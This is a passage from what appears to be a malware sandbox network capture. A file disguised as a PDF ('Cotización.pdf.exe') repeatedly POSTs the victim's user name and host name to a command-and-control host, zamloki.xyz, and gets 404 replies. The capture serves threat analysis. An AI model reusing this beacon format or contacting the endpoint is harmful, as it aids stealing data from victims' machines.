                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:02.800510883 CEST | 5721 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:03.069333076 CEST | 5722 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cS3wI4jaXDuOal43U507uw8iLV06NwC4ylwLt%2BZEoaT%2B5qpRgBM8SEvgGh9xw1JITlZgcOlmefn6sa8roGnJ7A%2BaSY%2BWJb1rRCWsDiu%2FlP1JEMTmcl5KruDvI2L3FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550527c414e19-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    129 | 192.168.2.3 | 49868 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:03.312508106 CEST | 5722 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:03.330399990 CEST | 5723 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:03.713957071 CEST | 5723 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5W6XLfEcCZS4tftxJwveF0%2BAH2wQ0GghprnmONJpvUfOViJBpWIRKVJFwUOTNvQPm4XvyO2a6mfcwW%2FwQsl%2BB%2FFzRyHO7IE9AB%2BmUEtuK5Sdtyc4ymWIipVquv%2BSwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255055ce3f2c42-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    13 | 192.168.2.3 | 49742 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:55.175688028 CEST | 1311 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:55.195698977 CEST | 1312 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:55.451536894 CEST | 1315 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D53vuKu8OfgD0mmYkJ0X5LLwHD1rzD4ET8%2FgpLObMr%2FfUquX%2BnBZUGSBBNrZGhNr%2B4PWIOL0MTg4ZSrcdVy6UnwUsTZed9BZ2vXabnnGzc%2B6u4JC3hdC3Yrt3zMCtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eabedf905cc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    130 | 192.168.2.3 | 49869 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:03.961791039 CEST | 5724 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:03.981961012 CEST | 5725 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:04.251977921 CEST | 5725 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVYPAYMB9amkWvhu%2B8vGcG%2B20hFEJZFI81mqrffMb%2B2O2205clkMLZIH6N5ZD8D4v6B5%2Bl3NLbjw1%2F9cX3t0gGI9dXzM%2BK8HgJdSbfcLWJ%2BlW7YbNTk87BRHxkSNYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255059df244de2-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    131 | 192.168.2.3 | 49870 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:04.505611897 CEST | 5726 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:04.523662090 CEST | 5727 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:04.784869909 CEST | 5727 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkM1jl7fg7yd7AC9S7xXQf8smyZT7mvonkDiyerrPtC80bCcRj9hoAFX9phJ1bMEi5UxoFfwq1njGuoVmM8AGdXUlphvJB0%2BAVrCgoMRoUQ2QSYgf8OVyZ9NsOa%2F8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725505d3e3b4d84-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    132 | 192.168.2.3 | 49871 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:05.042022943 CEST | 5728 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:05.062289953 CEST | 5728 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:05.304625988 CEST | 5729 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xgue6WVMx4i4bpa23efd7T71X5dUgGXttLN19EURHuVR18BOvEBEgODA7gburxaB6QH973WRU3iz6xm0bzCtp%2BjExLbLe8sHMwu7iU5BMf7pgluKL8CJ681tjGyyag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550609b4b4a97-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    133 | 192.168.2.3 | 49872 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:05.571856022 CEST | 5730 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:05.591779947 CEST | 5730 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:05.941456079 CEST | 5731 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lIMHcxnyr2Smhf%2FBkNW2T851Nos%2Bg4pgsZJHah6d%2Bfpnup%2BKnJHZXvAmR%2FC3ZSvcW3JzpoEGOmpOn%2FTTA6TMopI8iI1MKcqnpRA43T7JamSakb1MSN73P5qql3Hg4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255063e9f3c2fe-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    134 | 192.168.2.3 | 49873 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:06.223687887 CEST | 5732 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:06.246424913 CEST | 5732 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:06.496643066 CEST | 5733 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zYjTwGTEFBWsXOkZ1WG6cI7CXWmSZdp9co9eOIEaBBjQNIxVVDmWjwCvGYRq8iD9cdunWqrZuG%2FffNqNPctzzsDdwL9AHQTfiKD%2Fk4%2F1vNozEc3T%2F5iJY8Ha1hzBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255067fc704eb0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    135 | 192.168.2.3 | 49874 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:06.779618979 CEST | 5734 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:06.801768064 CEST | 5734 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:07.053307056 CEST | 5735 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WIuUT%2BR5cEe8GExOX1nSpHMIf5qrSNVnLsGQm%2FVMazOraKshXHwD8S%2BbMIkJahk1BTdlubD2m1lmfldW%2F1vLewtb294h95AJhalr9bMOwFpjsvRf1JxrNkCMJIg8Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725506b7d874e4a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    136 | 192.168.2.3 | 49875 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:07.265630007 CEST | 5736 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:07.283562899 CEST | 5736 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:07.538237095 CEST | 5737 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yB8PuiIFqfcuR%2BJsoMnjhbvwRHJyO0w2GNkuwNnAgjN4n1nj8I380iZOKAVk0TQ%2FnHLxzBqhOQRZRfyvNPIaLVNsImRGwEVTG5tJ1%2F8UjTxLjIAZzDs2J%2B%2B4eTnmiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725506e7ef92b1a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    14 | 192.168.2.3 | 49743 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:55.876569986 CEST | 1318 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:55.896106005 CEST | 1319 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:56.145951986 CEST | 1321 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vUK28H8B4nsoIp2oF8TemiZ%2FUQalqqPlceRoWSnA115jxnVeHgzqm%2Bx0U5m7%2BxM3kVgDEtb3EzYNm%2B%2FED5Y506dnxwxziq853YUFVVa9Z4BITaYahbvp70xv0oP%2B7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb04f92061c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    15 | 192.168.2.3 | 49744 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:56.388957024 CEST | 1324 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:56.410024881 CEST | 1324 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:56.682169914 CEST | 1325 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6O4NsK3Iqt1Unh9Djs8UesYO8fvWkkQd0ADAnyGRMl%2FPvMii5paX6c0ijDqD0FIqHPwqMtA6vDfk3A5EU%2BsPOXqB4A3dQmQkQb0v7pnRmURilTejshbNfUltm3LxkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb37e8b16e6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    16 | 192.168.2.3 | 49745 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:57.155353069 CEST | 1329 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:57.175076008 CEST | 1329 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:57.438842058 CEST | 1331 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T647JiPYGB%2F%2BHRuP27dXZKJRfBTGvihhCZCCKLqUMbXIic4wyZcvjil%2BL8fbv9i%2FNV39%2FGAS%2Bvju1Uuz6cCpTYF5G%2FPaX5b0vAIu8zjeDjbu963zZ%2FikjIhudUylcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254eb84eab2bd6-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    17 | 192.168.2.3 | 49746 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:58.602627039 CEST | 1334 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
